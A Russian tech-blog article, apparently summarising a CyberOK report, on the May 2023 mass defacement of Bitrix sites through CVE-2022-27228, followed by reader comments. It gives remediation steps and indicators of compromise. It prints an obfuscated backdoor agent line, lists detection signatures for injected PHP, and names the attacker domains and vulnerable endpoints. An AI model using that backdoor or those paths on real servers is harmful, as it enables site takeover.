26 мая 2023 года произошёл массовый дефейс веб-серверов национального сегмента сети интернет .РФ. В качестве цели атаки выступила CMS «Битрикс».
В ходе расследования выяснилось, что атака подготовлена заранее. Подготовка велась с 2022 года через известные уязвимости, включая CVE-2022-27228. Техническое описание см. на форуме разработчиков. Возможно, это самая крупная атака против национального сегмента .РФ в его истории.
Компания CyberOK выпустила отчёт c описанием атаки и разъяснением необходимых действий для того, чтобы удалить с сервера бэкдор, устранить уязвимости «Битрикса» и восстановить приложение. Также приведены рекомендации по защите веб-приложения.
Ещё в июле 2022 года Национальный координационный центр по компьютерным инцидентам (НКЦКИ) предупредил об угрозе заражения сайтов под управлением «Битрикс» через 0day-уязвимость CVE-2022-27228, известную с 3 марта 2022 года.
11 марта 2022 года разработчик оперативно исправил уязвимость и обновил модуль
vote до версии 21.0.100, а саму CMS до версии 22.0.400.К сожалению, некоторые системные администраторы не получили эту информацию или проигнорировали её.
▍ Эксплуатация уязвимости
Уязвимость в модуле
vote «Битрикс» позволяет удалённому злоумышленнику записать произвольные файлы на сервер посредством отправки специально сформированных сетевых пакетов.Согласно описанию НКЦКИ за март 2022 года, в дальнейшем злоумышленник использовал эти файлы для заражения клиентских браузеров, то есть посетителей сайта.
- После эксплуатации уязвимости злоумышленник загружает на веб-сайт модифицированный файл (
/bitrix/modules/main/include/prolog.php), в который добавляется строка (https://techmestore[.]pw/jqueryui.js), вызывающая сторонний JS-скриптjquery-ui.js.
- При посещении заражённого веб-сайта под управлением «Битрикс» в кэш браузера пользователя внедряется JS-скрипт, который загружается из различных директорий веб-сайта, к примеру:
bitrix/js/main/core/core.js?1656612291497726
bitrix/js/main/core/core.js?1656598434497824
bitrix/templates/cm_main/js/jquery-1.10.2.min.js
Злоумышленник мог использовать как один вектор заражения, так и оба сразу.
Сейчас такой эксплуатации уязвимости мы не наблюдали. В отличие от предыдущих атак, в мае 2023 года уязвимость использовалась не для перенаправления пользователей на сторонние сайты, а для дефейса и установки бэкдора (см. ниже).
В 2023 году, кроме модуля
vote, злоумышленники использовали ещё и служебный модуль fileman, реализующий возможность визуального HTML-редактора. В составе этого модуля присутствует уязвимый скрипт html_editor_action.php. Эксплуатация уязвимости этого файла аналогично CVE-2022-27228 позволяет неавторизованному злоумышленнику удалённо выполнять произвольный код на целевой системе.В результате успешной эксплуатации этой уязвимости в логе появится
строка с успешным POST-запросом к файлу
/bitrix/tools/html_editor_action.php вроде такой:***POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 ***▍ Описание атаки 2023 года
Основные действия после взлома:
- заменяется index.php в корневой директории веб-приложения;
 
- встраивание вредоносного кода в PHP-скрипты модулей;
 
- удаляется файл /bitrix/.settings.php;
 
- создаются скрипты Агентов с вредоносным кодом или модифицируются
 существующие скрипты;
 
- удаляют данные из таблиц базы данных b_iblock,b_iblock_element,b_iblock_element_property;
 
- создание файлов .htaccessво всех каталогах веб-приложения;
 
- создание PHP-скриптов в директории /bitrix/admin/с произвольными именами файлов.
▍ Необходимые действия после заражения
Согласно рекомендациям НКЦКИ, после заражения необходимо совершить следующие действия:
- Провести обновление «Битрикс» до актуальной версии, как минимум 22.0.400.
 
- Проверить веб-сайт на наличие вредоносного JS-кода. Например, можно установить из каталога готовых решений «1С-Битрикс: Поиск троянов» и запустить сканирование. Для этого необходимо открыть панель управления сайта и перейти на следующую вкладку:- 
Настройки→bitrix.xscan→Поиск и Поиск (бета)
 
 Модуль отсканирует весь сайт и отобразит выявленные подозрительные файлы.
 По факту нынешней атаки выявлены следующие индикаторы компрометации:Рекомендуется обратить внимание на файлы со случайно сгенерированным именем из набора символов [a-z, 0-9] в каталогеИмя файла Директория Пример команды для поиска xmlrpcs.php Используются различные 
 каталогиfind ./ -name xmlrpcs.php inputs.php Используются различные 
 каталогиfind ./ -name inputs.php 
 рекомендуется исключить из поиска легитимный файл:
 /bitrix/modules/sale/lib/delivery/inputs.phpl.php /bitrix/src/app/ find ./ -name l.php /bitrix/tools/spread.php /bitrix/tools/ 
 /bitrix/access.php 
 wp.php
 term.php
 locale.php
 themes.php
 network.php
 container.php
 router.php
 wp-login.php/bitrix/modules/iblock/lib/biz 
 proctype/любой из файлов в указанной директории /bitrix/tools/send_trait_imap.p 
 hp/bitrix/tools/.cas.php 
 /bitrix/tools/.cas.tmp.php/bitrix/admin/и в корневой директории сайта.
 Были выявлены файлы вида:- 
/bitrix/admin/f408f2b7df70.php
 
- 
/bitrix/admin/8f1c222aae51.php
 
- 
/2469a41bac71.php
 
- /98826/bfd99.php
 
 При обнаружении вредоносного кода следует провести мероприятия по его удалению, а также проверить систему на компрометацию.
 
- 
- Проверить наличие фактов нелегитимной модификации файлов, посредством команды, которая осуществляет поиск и сортирует изменённые и новые файлы за последние 30 дней, кроме последнего дня:find /home/Путь к вашей папке Bitrix/public_html -type f -mtime -30 ! -mtime -1 -printf '%TY-%Tm-%Td %TT %p\n' | sort -r
Например, если проверить файл
bitrix/modules/fileman/admin/fileman_html_editor_action.php, то мы увидим следующее:«Плохой» код
«Хороший» код
Кроме создания новых файлов, злоумышленники могут встраивать вредоносный код в существующие файлы. Его можно найти по следующим фрагментам строки:
- 
str_rot13
 
- 
md5($_COOKIE
 
- 
bitrixxx
 
- 
eval(base64_decode
 
- 
BX_STAT
 
- 
BX_TOKEN
 
- 
parse_str(hex2bin
 
- 
iasfgjlzcb
 
- 
QlhfVE9LRU4=
 
- 
gzinflate(base64_decode
 
- 
C.A.S
 
- urldecode(base64_decode(hex2bin
Из результатов поиска по
str_rot13 необходимо исключить следующие файлы:- 
/bitrix/modules/main/classes/general/vuln_scanner.php
 
- 
/bitrix/modules/main/lib/search/content.php
 
- bitrix/modules/socialnetwork/lib/item/logindex.php
На странице со списком Агентов «1С-Битрикс» (
/bitrix/admin/agent_list.php) можно проверить вызываемые функции на наличие вредоносного кода. Для этого открываем панель управления сайта и переходим на вкладку Настройки → Настройки продукта → Агенты.Название агента может быть любым, но обычно он виден визуально, как на КДПВ:
После восстановления сайта или БД из резервной копии рекомендации следующие:
- ограничить административные доступы к CMS, а также, в случае наличия, FTP, MySQL.
 
- проверить функции, вызываемые функциями-агентами (/bitrix/admin/agent_list.php), на наличие вредоносного кода. Пример модификации агента:$arAgent["NAME"];eval(urldecode(strrev('b3%92%92%22%73%b6%34%a5%b6%76%34%26%86%a5%85%a5%73%b6%96%d4%03%43%65%b4%46%c6%74%a4%26%e4%74%a4%f6%15%d6%36%67%86%96%36%f6%e4%75%05%57%15%74%a4%07%37%97%b4%07%25%97%f4%07%d4%74%a4%f6%43%75%a5%37%a4%84%46%a7%87%45%16%b6%37%44%d4%93%b6%74%a4%f6%94%33%26%d6%47%44%45%d4%65%c6%45%07%36%d6%26%07%a4%84%46%a7%86%35%05%b6%25%97%f4%07%03%c6%94%d6%24%a7%d4%23%95%75%a5%43%d4%d6%d4%d6%65%44%f4%97%55%d6%95%c6%65%74%f4%97%15%75%e4%23%55%d6%d4%53%15%44%a5%43%d4%74%a5%a6%e4%d6%94%26%65%55%35%c4%93%03%45%44%93%64%a4%f6%55%74%a5%67%e4%75%a5%b6%93%64%e4%23%55%23%36%86%a4%75%05%a6%25%97%f4%07%14%44%b4%e6%53%75%16%03%a4%33%26%77%65%d6%36%66%a4%33%26%97%a4%85%a5%76%14%84%16%77%93%44%05%22%82%56%46%f6%36%56%46%f5%43%63%56%37%16%26%02%c2%22%07%86%07%e2%f6%c6%96%57%86%f5%e6%96%47%57%07%f2%37%c6%f6%f6%47%f2%87%96%27%47%96%26%f2%22%e2%d5%22%45%f4%f4%25%f5%45%e4%54%d4%55%34%f4%44%22%b5%25%54%65%25%54%35%f5%42%82%37%47%e6%56%47%e6%f6%36%f5%47%57%07%f5%56%c6%96%66%')));
Рекомендации по защите веб-сайтов:
- перевести работу сайта на актуальную версию PHP 8.
 
- обновлять CMS Bitrix до актуальных версий.
 
- включить проактивную защиту CMS Bitrix: проактивный фильтр (https://dev.1cbitrix.ru/user_help/settings/security/security_filter.php) и контроль активности (https://dev.1cbitrix.ru/user_help/settings/security/security_stat_activity.php).
 
- проверить сайт инструментом CMS Bitrix «Сканер безопасности»
 (/bitrix/admin/security_scanner.php).
 
- закрыть доступ к файлам на уровне сервера (например, в .htaccess)- 
/bitrix/tools/upload.php
 
- 
/bitrix/tools/mail_entry.php
 
- 
/bitrix/modules/main/include/virtual_file_system.php
 
- 
/bitrix/components/bitrix/sender.mail.editor/ajax.php
 
- 
/bitrix/tools/vote/uf.php
 
- 
/bitrix/tools/html_editor_action.php
 
- /bitrix/admin/site_checker.php
 
 
- 
- Добавить в конфигурацию веб-сервера запрещающие правила. Пример правил для Nginx:location /bitrix/tools/vote/uf.php { if ($request_method = POST ) { deny all; } } location /bitrix/tools/html_editor_action.php { if ($request_method = POST ) { deny all; } }
▍ IOC
otrasoper[.]ga/help/?23211651614614
techmestore[.]pw
unasinob[.]cf
core.js?1656612291497726 — d74272539fc1c34fa5db80a168269d319d8c541bb36cbf0e99233cbe7ab9474d
core.js?1656598434497824 — da9c874d43fc94af70bc9895b8154a11aab1118a4b5aefde4c6cee59f617707e
jquery-1.10.2.min.js — 0ba081f546084bd5097aa8a73c75931d5aa1fc4d6e846e53c21f98e6a1509988Примечание. В некоторых случаях сайт может быть заблокирован НКЦКИ по причине размещения противоправного контента на взломанном сайте, а также из-за его использования злоумышленниками для проведения компьютерных атак на критическую инфраструктуру в соответствии со статьёй 5 Федерального закона № 187-ФЗ «О безопасности критической информационной инфраструктуры РФ», пунктом 5.1 Приказа ФСБ России от 24.07.2018 г. № 366 и пунктом 9 Правил централизованного управления сетью связи общего пользования, утверждённых постановлением Правительства Российской Федерации от 12 февраля 2020 года
№ 127.
После дефейса на сайте появляется текст, который может привести к блокировке со стороны НКЦКИ по причине размещения противоправного контента
Блокировка применяется до момента фиксации НКЦКИ факта удаления противоправного контента.
В этом случае после удаления бэкдора и устранения уязвимостей необходимо связаться с командой Национального координационного центра по компьютерным инцидентам.
Комментарии (92)
 - vilgeforce05.06.2023 13:22+7- "Подготовка велась с 2022 года" - почему вы так решили?  - Scratch05.06.2023 13:22+40- А всё же верно, только надо уточнить, что подготовка велась не "там", а "тут". И фактически началась с релиза этого самого битрикса, который в основном обслуживается бегунками на пол ставки, вместо нормальной сервисной программы автоматического обновления. Это практически готовый троянский конь федерального масштаба, замаскированный под монопольную CMS  - balamutang05.06.2023 13:22+1- В битриксе как раз обновление автоматическое, все что нужно сделать бэкап да кнопку обновления ткнуть. Если этого админ не делает периодически то это его проблемы  - hullaballoo05.06.2023 13:22- И лицензию не забывать продлевать, пушо без активной лицензии автообновление работать не будет.  - balamutang05.06.2023 13:22+1- Ну обновления почаще выходят, раз в квартал как минимум надо обновляться, а лицензия раз в год обновляется. - Суть возражения тут я не особо улавливаю, то что битрикс платный? Так не покупайте битрикс, используйте вордпресс/джумлу и тд. - Все по деньгам и по техническим требованиям, некоторым вообще страничек в вк и инсте и магазина на озоне/вб хватает, даже обновления ставить не надо как в том же вордпрессе/битриксе, вся возня айтишная на аутсорсе получается, только товар подвози. 
 
  - playnet05.06.2023 13:22+2- "автоматическое" 
 "ткнуть"
 почти как "сухая вода" - balamutang05.06.2023 13:22- Ну знаете, это не загружать по фтп и не в консоли файлы распаковывать. Вы попробуйте например инстанс рокетчата обновить, для сравнения. - А полностью автоматические обновления в отвественных местах никто (психически здоровый) не ставит, такие вещи все равно на контроле должны быть.  - playnet05.06.2023 13:22- привет винде? )) 
 Там нужна масса усилий отключать именно автоматические обновления.
 И да, есть всус или как его.. тем не менее, оно именно что автоматическое.
 
 
 
 
  - programmerguru Автор05.06.2023 13:22-1- Привет! Одного из хакеров удалось отловить. Он даёт показания.  - vilgeforce05.06.2023 13:22+13- Да вы что?! Вот прямо за неделю смогли отловить злого хацкера, который планировал операцию аж целых 6 месяцев? Возбудили уголовное дело, провели ОРМ, аресты, обыски и вот это все? Что-то в стране поменялось, что их начали так быстро ловить, не иначе...  - lopatoid05.06.2023 13:22+18- Поменялось, конечно. Раньше хотя бы делали вид, что соблюдают законы, а сейчас можно уже этим на заморачиваться: юристы из страны разъехались; независимые СМИ, которые могли бы написать о несправедливости -- тоже эвакуировались из страны или заблокированы Роскомнадзором. И если раньше тот же Богатов всё-таки вышел из заключения, то сейчас властям нет смысла отпускать бедных владельцев затрояненных компьютеров, через которые хакеры могут орудовать.  - vilgeforce05.06.2023 13:22- Обидно, что ловят не тех: ты следакам на блюдечке с голубой каемочкой все приносишь, а ловят каких-то левых людей :-/ 
 
 
 
  - Darkholme05.06.2023 13:22+6- Потому что в сознании обывателя сразу же рисуется образ опасного ЛГБТ секс-инструктора из НАТО, который одной рукой ломает сайты а другой, кхм, инструктирует (или разрабатывает?). 
 
 - BoberMod05.06.2023 13:22+7- А почему скриншот замазан? Там же кроме текста ничего нет. Неужели в сверхдержаве за обычный текст на скриншоте сайта могут заблокировать сайт?  - programmerguru Автор05.06.2023 13:22+7- Откуда вы знаете, что там есть? :)  - BoberMod05.06.2023 13:22+12- Я не знаю, что конкретно "там есть", но по контурам видно только логотип и текст. Что такого в 2 абзацах текста на скриншоте, что его так тщательно замазали?  - playnet05.06.2023 13:22- "логотип" скорее всего содержит цвета соседнего государства. А в данное время это хуже свастики.... 
 
 
  - TheRaven05.06.2023 13:22+32- Если погуглить источник заглавной картинки, то можно найти статью с немного более раскрытой тех. инфой и незамазанным скриншотом. Так, вот, на скриншоте есть страшное слово "Конституция".  - vilgeforce05.06.2023 13:22- Наверное, "подготовка с 2022 года" это про публикацию инструкции по эксплуатации уязвимостей... 
  - Wesha05.06.2023 13:22+6- А другие страшные слова с той картинки почему не упомянули? - Например, слово на У?  - BoberMod05.06.2023 13:22+3- Например, слово на У? - Все настолько плохо, что "Украина" уже нельзя называть, а только по первой букве указывать? - И что в этом тексте такого, что его нельзя показывать?  - Wesha05.06.2023 13:22+14- Все настолько плохо - Всё ещё хуже. - А если б назвал — было бы -10. Плавали, знаем.  - BoberMod05.06.2023 13:22+11- Ну если пропаганда здравого смысла это плохо, а "Украина" это страшное слово, которое нельзя называть, то "всё идет по плану", спасибо  - Wesha05.06.2023 13:22+1- Это Хабр, привыкайте. И да пребудет с Вами карма!  - QDeathNick05.06.2023 13:22- Совсем офтоп, но почему я не могу голосовать за часть комментариев? Например за ваш и выше, а за другие могу. - PS. А, видимо это был глюк, обновил страницу, теперь ни за какие не могу :)  - Wesha05.06.2023 13:22+2- Обновить страницу пробовали? Иногда помогает. 
- Голсование за комментарии блокируется, если исчерпался заряд голосования (а у нас с Вами он не очень большой) 
- Голосование блокируется, если с момента создания статьи прошло сколько-то там дней (не наш случай, но просто для полноты картины). 
 
  - mvv-rus05.06.2023 13:22+1- Число возможных голосов за комментарии ограничено Кармой: например, у вас их должно быть 20 в сутки. 
 
 
 
  - mvv-rus05.06.2023 13:22+6- А другие страшные слова с той картинки почему не упомянули? - Дык, "Конституция " там и есть самое важное слово. Вас не удивил явный анахронизм на картинке? Меня - удивил: День Конституции Украины празднуется 28 июня. В понятных вам терминах: такой текст для сегодняшнего дейеса так же удивителен, как и текст сегодняшнего же воображаемого дефейса американского сайта с упоминанием Declaration of Independence (праздник ее принятия празднуется, как всем известно, 4 июля.). - Кароче, меня это таки удивило и я полез чисто для себя поинтересоваться вопросом. Первые же поиски в интернетах показали, что взлом ряда российских сайтов в День Конституции Украины через этот вектор действительно имел место: - В День конституции Украины, 28 июня, на главных страницах целого ряда российских сайтов в результате деятельности киберпреступников появились антивоенные призывы и поздравления с праздником. - Для поиска содержимого тогдашнего дефейса я обратился к русскоязычным ресурсам в нейтральных странах, и таки кое-что нашел, а именно - кусок текста прямо с вашей картинки - В связи с этим у меня сложилась рабочая гипотеза: некто получил в свои руки одновременно и список поддоменов домена рф., и тот самый скрипт, которым делался дефейс в прошлогодний День Конституции Украины. Как это произошло - я без понятия. После чего этот некто и запустил скрипт по списку, нимало не задумываясь над его смысловым содержанием. Из этого, кстати, следует и моя оценка квалификации автора атаки: script-kiddie - PS Ну, а ещё я бы мог сказать ряд добрых слов про разгильдяство админов, но, из профессиональной солидарности - не буду: они теперь сами все осознали (надеюсь ;-) ). - PPS Если вас таки интересует, что же послужило спусковым крючком реакции РКН, то, по моим оценкам, это - последняя фраза (т.е. часть предложения) в предпоследнем абзаце. Но это не точно - к тайным знаниям РКН я не допущен (и даже не хочу быть допущенным: не люблю формы допуска еще с тех давних советских времен, когда мне приходилось их подписывать - благо это было давно: советские времена и сроки действия допуска давно кончились). А так как текст с этой фразой появился почти год назад, то он, по моим предположениям, он лежал себе лежал где-то в базах данных РКН, а вот теперь дождался своего часа и вызвал чисто автоматически блокировку пострадавших сайтов.  - zabanen205.06.2023 13:22+1- лингвист по указке товарища майора заключает что означает тот или иной текст. если линвист с выдумкой и решает по своему усмотрению - этот лингвист остается без работы и ищется более сговорчивый лингвист. https://www.kommersant.ru/doc/5089586 
 
 
 
 
 
  - cyberserk05.06.2023 13:22+4- Прости, пожалуйста, Володымыр, а в маленькой но гордой сверхдержаве приветствуется поздравления с Днем Конституции России на ее ресурсах? 
 
 - javalin05.06.2023 13:22+13- через 0day-уязвимость CVE-2022-27228, известную с 3 марта 2022 года. - Почему-то всегда думал, что уязвимости нулевого дня, это те, о которых неизвестно широкой публике.  - morijndael05.06.2023 13:22+7- Не публике, а разработчикам. Т.е 0day == у разработчиков было 0 дней (и шансов) на исправление. Конечно, если известно широкой публике, то разработчикам обычно тем более, но... у 1С-Битрикс похоже свой путь /j 
 
 - ifap05.06.2023 13:22+18- Ещё в июле 2022 года Национальный координационный центр по компьютерным инцидентам (НКЦКИ) предупредил об угрозе заражения сайтов под управлением «Битрикс» через 0day-уязвимость CVE-2022-27228 - Пфф... еще в марте 2022 года взломали "Госмонитор" и через него дефейснули десятки если не сотни госсатойв и-и-и... спустя год 8% сайтов федеральных госорганов продолжают загружать с взломанного сайта исполняемый код. При том что сайт заброшен, сертификат давно протух. А тут какая-то уязвимость в какой-то битриксе... 
 - Zivaka05.06.2023 13:22+8- Еще много лет назад после подобной ситуации почти насильно заставил разработчиков добавить в гит весь проект на Битриксе целиком, а не только шаблоны и модули. Выслушал немало доводов, что это не правильно и так никто не делает. Вот только в похожих ситуациях стало намного проще разобраться, что и где случилось, а также оперативно откатить эти изменения. Да, при обновлении есть ряд сложностей, но на больших проектах это случается 1-2 раза в год и вполне можно смириться. А в целом же что-то подобное у Битрикса раз в год, но точно случается, к сожалению.  - Areso05.06.2023 13:22+2- решето.джипег  - Zivaka05.06.2023 13:22+1- Это следствие его популярности и тот факт, что запустить на нем проект достаточно легко сейчас.  - NikitchenkoSergey05.06.2023 13:22+8- К сожалению, это следствие не популярности, а полного игнорирования разработчиками техдлога и всех возможных стандартов сообщества. Кодовая база и архитектура битрикса (кишки наружу, код на массивах с кучей ошибок, без тестов, без анализатора) находится на уровне 2010 года, со всеми вытекающими. 
 Кто-то может сказать, что они так заботились о юзерах, типа обратная совместимость и обновления, которые можно накатить с любой версии. Ну во-первых, это не так, все равно куча проблем и нужно вручную фиксить много всего, юзерспейс переделывался. Во-вторых - это медвежья услуга, теперь имеем, что имеем.
 Еще они известные велосипедисты, со всеми вытекающими. Тут у них в комментах спрашивал про композер - сказали "небезопасно использовать эти ваши доктрины". Пилят какие-то свои неюзабельные поделки на массивах.
 Битрикс в таком виде нужно было давно закопать. Если они сейчас в недрах не пилят какой-нибудь "Битрикс 2" как цмс поверх симфони, то скоро их время пройдет. - Zivaka05.06.2023 13:22+3- Все верно, но популярность тут тоже имеет немалую роль, так как и внимания больше в целом и "эффект" от ситуаций куда заметнее в частности. 
  - vanxant05.06.2023 13:22-3- Судя по вашему комменту, вы битрикс видели последний раз где-то в 2010-ом, ну максимум 2015-ом.  - NikitchenkoSergey05.06.2023 13:22+8- Теперь уже к моему сожалению, это не так. 
 А что поменялось с 2010? Появилась единая точка входа, все кишки спрятали выше document root? Стали придерживаться PSR? Внедрили композер, автотесты, линтер? Перестали велосипедить? Нет :) - vanxant05.06.2023 13:22-1- Единая точка входа была кажется и в 2010, urlrewrite называется:) - Кишки выше docroot ну не в 2010, но в 2015 уже были. Называется "сайт в папке". Требует написания пары строчек в конфиге nginx-а, а поскольку большинство хостингов этого не позволяют, ну выпонели. - С PSR ситуация улучшается. Композер юзать никто не мешает в обе стороны (как брать чужие пакеты, так и подключать к ним битрикс). АПИ на массивах давно заброшено и не развивается, но поддерживается для обратной совместимости (хотя под капотом там часто уже обёртки над ORM-ом). - А вот насчёт велосипедов ситуация ровно обратная. Для отечественной бизнес-инфраструктуры (банки, маркетплейсы, соцсети, смс-шлюзы, онлайн-кассы, доставщики и т.д.) модуль для битрикса это пункт намбер ван. Намбер ту - плагин для вордпресса. А вот "крудошлёпы на фреймворках" таскают собственные глюкавые велосипеды из проекта в проект. 
 
 
 
  - Areso05.06.2023 13:22+3- Можно перечислять много современных веб-фреймворков, но кроме CMS Bitrix и CMS Wordpress (кстати, обратите внимание, что хаят именно CMS-ки, а не фрейморки, на которых тоже легко собрать что-то рабочее с минимальными усилиями), решето ни с кем из них не ассоциируется.  - Zivaka05.06.2023 13:22- Да, но только на Битриксе вы можете запустить условный проект за один вечер и это будет очень даже неплохой внешне интернет-магазин, а любом фреймворке это вряд ли получится. И не факт, что для большинства проектов выбор фреймворка даже в перспективе может окупиться, так как до этого момента доживает крайне мало проектов)  - Areso05.06.2023 13:22+2- Opencart  - Zivaka05.06.2023 13:22+3- И да, и нет одновременно. Если уходить в детали именно для e-commerce, которые крайне важны на самом деле, то в Битриксе есть много чего сходу или в их маркетплейсе, что в других движках придется с нуля реализовывать. На начальном этапе Битрикс для многих - более простой и понятный выбор. 
 
  - xSVPx05.06.2023 13:22- Ээээ. интернет магазин за вечер ;)? - Куда вы торопитесь ? - Зачем ? Ради чего ? Одни фотки и тексты займут недели... - Я видел таких "ИМ" три. Не знаю за вечер ли, но судя по словам владельцев за них были заплачены сотни тысяч рублей. Все на Битриксе. - Первая страница занимала от 40 до 100мб :))). Да. Мегабайт. Да. Сто. - Достаточно всего лишь использовать вместо превьюшек файлы в 4к и установить им визуальные размеры. Чего париться то ? А давайте ещё несжатым видео запланируем. - Я не знаю кто был те герои, которые это все понахреначили. Но, вероятно, действительно "за вечер"... - Второй пример: корпоративный портал за полмиллиона. Из 3 (трёх) страниц. Люди сделавшие его и сдавшие заказчику даже не озаботились созданием резервных копий хоть каких-то путем жмакания кнопочки в админке. Зато настроили автообновления, которые сломали его через пару месяцев. Ну или сами зашли и сломали, теперь уж не разобраться... - Итд итп. - Если вам неважен результат - сделать за вечер отличный план.  - Zivaka05.06.2023 13:22- Про вечер я условно, речь просто про достаточно быстрый запуск и без привлечения команды разработчиков, скорее просто технически подкованных специалистов. - Фотки и тексты могут и годы занимать, потому что это не прекращающийся процесс, у нас по крайне мере именно так. - Странных проектов много, я могу множество примеров привести, однако не все запускают Озон, МВидео и т.п., поэтому мотивация сильно отличается. Как и техническая подкованность. 
 
 
 
 
 
 
 - vit125205.06.2023 13:22-1- Цена жизни в "коммунальной квартире" и использовании общественного продукта. С другой стороны, а кто у нас кроме Yandex.Market и ОЗОН свой магазин сделали? Очень дорого для малого бизнеса делать что-то свое.  - Areso05.06.2023 13:22+2- магазин - у вас в слове маркетплейс много ошибок. - И даже в таком случае есть Вайлдберис, есть Ярмарка Мастеров, есть Авито, Ламода, СберМегаМаркет...  - Areso05.06.2023 13:22+3- Не совсем понимаю логику минусующих мой комментарий. - В РФ по пальцам двух рук пересчитать маркетплейсов, но их и по определению не может быть слишком много; в то время как интернет магазинов -- в том числе самописных -- в России очень много. Потому что нет ничего сложного в том, чтобы налабать сайтик и подключить модуль оплаты. 
 
  - karavan_75005.06.2023 13:22+2- Обязательное условие безопасности -- свой продукт? По моему, нет. - Грамотная поддержка любого продукта -- да, одно из условий, но обязательно на всех этапах разработки и эксплуатации. Это условие считаю доступным каждому заказчику. 
 
 - ValdikSS05.06.2023 13:22+25- В некоторых случаях сайт может быть заблокирован НКЦКИ по причине размещения противоправного контента на взломанном сайте - Большое спасибо нашему доблестному церту и ДЦОА: внереестровые блокировки сайта на ТСПУ, без уведомления владельца сайта/домена и хостера — это то, что мы давно ждали и к чему стремились! Ведь главное — как бы норот не увидел ужасающие сообщения, а администратор сайта не мог на него зайти, чтобы вернуть всё назад, сидел и недоумевал вместе с хостером о причинах недоступности сайта из РФ! - а также из-за его использования злоумышленниками для проведения компьютерных атак на критическую инфраструктуру - Ага-ага, блокируют пользовательские сети, потому что на сетях хостинг-площадок ТСПУ едва ли встречается :) - Блокировка применяется до момента фиксации НКЦКИ факта удаления противоправного контента. - Как минимум в одном известном мне случае блокировка началась уже после восстановления работы сайта. - С ДЦОА простой смертный связаться не может: номеров телефонов и емейлов нет в открытом доступе, а если и частное лицо им позвонит, от общаются они примерно так:  - vanxant05.06.2023 13:22+2- на сетях хостинг-площадок ТСПУ едва ли встречается - Проверяется элементарно жи ну. Попробуйте развернуть VPN на интересующей хостинг-площадке.  - ValdikSS05.06.2023 13:22- У меня не особо много серверов в РФ, но на тех, что есть, ТСПУ не встречается. Это не значит, что на них вообще нет блокировок. - Проверить довольно просто: - curl -L https://play.google.com/
 Если открывается — ТСПУ нет. - blind_oracle05.06.2023 13:22- А что, гуглплей уже заблокирован разве?  - ImidgX05.06.2023 13:22- На Билайне в браузере показывает таймаут. 
 А в консоли зависает на handshake клиента.
 curl -iv -s https://play.google.com/- Trying 142.250.74.110:443...- TCP_NODELAY set
- Connected to play.google.com (142.250.74.110) port 443 (#0)
- ALPN, offering h2
- ALPN, offering http/1.1
- successfully set certificate verify locations:
- CAfile: /etc/ssl/certs/ca-certificates.crt CApath: /etc/ssl/certs
- TLSv1.3 (OUT), TLS handshake, Client hello (1):
  - Tippy-Tip05.06.2023 13:22-3- Англичанка гадит.Даже на хабре писали, что Гугл по собственной инициативе без широкой огласки забанил пользователей из РФ и Белорусии. - Tippy-Tip05.06.2023 13:22- Господа минусеры! Соблаговолите пожалуйста почитать соответствующую ветку на 4pda, начиная хотя бы отсюда  - balamutang05.06.2023 13:22- Истина давно уже никому не нужна, минусы тут зачастую ставят на эмоциях и ваша "англичанка" эти эмоции отлично триггерит. - Удерживайтесь от политических дискуссий и штампов если вас беспокоят минусы. 
 
  - Stanislavvv05.06.2023 13:22- То есть, пользователей забанил, а датацентры - нет? 
 У меня вдс в Екб, оттуда открывается. И по whois - тоже RU, а не где-то ещё.
 
 
 
 
 
  - ImidgX05.06.2023 13:22- У меня так и случилось. Сайты оперативно откатил, но блокировка всё равно случилась на следующий день. Провайдеры (МТС, Мегафон и Билайн) их блокируют и не сознаются. РКН два раза ответил на запрос, типа мы ничего не блокируем, при этом сайты не грузятся. - Проще сменить домен. (-_-) 
  - ImidgX05.06.2023 13:22+1- Подскажите пожалуйста, есть ли хоть какой-то вариант снять эти "внереестровые блокировки сайта"?  - Darkholme05.06.2023 13:22+1- Есть, но он(и) не технические (как и корень проблемы) и к тематике сайта не относится 
  - idmrty05.06.2023 13:22+1- После лечения напишите на incident@cert.gov.ru — разблокируют за пару часов. 
  - Stanislavvv05.06.2023 13:22- 1) нужно таки написать как сказано, если всё ок - таки разбанивают, проверено. 
 2) блокировка снимается перевыпуском сертификата (вот хз, насовсем или временно).
 
 
 - zzzzzzzzzzzz05.06.2023 13:22- в дальнейшем злоумышленник использовал эти файлы для заражения клиентских браузеров, то есть посетителей сайта - чего_бля.jpg 
 
           
 










freeExec
С чего это тут какой-то битрикс олицетворяется со всия интернет рф?
Keeper9
Внедрение битрикса пора приравнивать к вредительству.
Areso
Ой, несмотря на то, что Битрикс, это кусок плохого кода, такие проблемы бывают с WordPress'ом, особенно с его плагинами.
plFlok
а вордпресс как будто не кусок плохого кода?
там ведь до сих пор апи взаимодействия с плагинами держится на том, что им разрешается редактировать глобальные переменные, содержащие итоговую вёрстку?
Areso
Вы правы, кусок плохого и неоптимизированного кода =)
В то время как WP -- кусок плохого кода.
SargeT
А какая из популярных cms с крупным сообществом не кусок плохого кода?
My-name
Так по сути - именно это и наблюдаем.
Просто уже и здесь появляются публикации по этой тематике.
Считаю это следствием излишнего перегиба, допущенного за счёт излишней монополизации
(это - характерное свойство закрытых систем).
Moskus
ASGAlex
Погуглить разные рейтинги - по ним битрикс стабильно входит в TOP-5 по частоте использования. Даже если это будет только 10% против 40% у вордпресса - всё равно кусок довольно лакомый, чтобы и им поживиться. А тесная связь с рунетом - скорее не потому, что с точки зрения авторов он что-то там олицетворяет, а потому, что за пределами рунета его либо мало, либо нет. Вордпресс по собиранию эксплойтов там отдувается за двоих, бедняга ????